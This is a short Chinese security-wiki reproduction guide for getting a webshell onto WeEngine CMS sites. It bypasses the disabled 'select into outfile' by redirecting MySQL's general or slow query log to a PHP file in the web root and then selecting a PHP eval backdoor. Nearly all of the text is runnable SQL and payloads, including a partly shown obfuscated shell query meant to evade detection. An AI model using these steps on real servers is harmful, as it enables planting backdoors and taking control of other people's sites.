微擎 绕过禁用函数写shell

一、漏洞简介

二、漏洞影响

三、复现过程

1.站点设置里面打开调试

image

2.执行语句

select into被禁止

image

3.利用日志文件写shell

show variables like '%general%';  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址

select '<?php eval($_POST[cmd]);?>'  #写入shell

image

4.SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$

补充:来自土司@GuoKerSb的分享

在无法修改general_log_file指向的地址且网站用户量多时刻处于查询的状态,我们还可以通过启动slow_query_log(慢查询日志,默认关闭)来写shell

set global slow_query_log=1;
set global slow_query_log_file='/var/www/html/1.php';
select '<?php eval($_POST[cmd]);?>' or sleep(11);

四、参考链接

https://www.vulnbug.com/Exploit/Microcomputer-CMS-bypasses-disabled-Intooutfile-and-safe-dog.html

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-12-16 01:08:16

results matching ""

    No results matching ""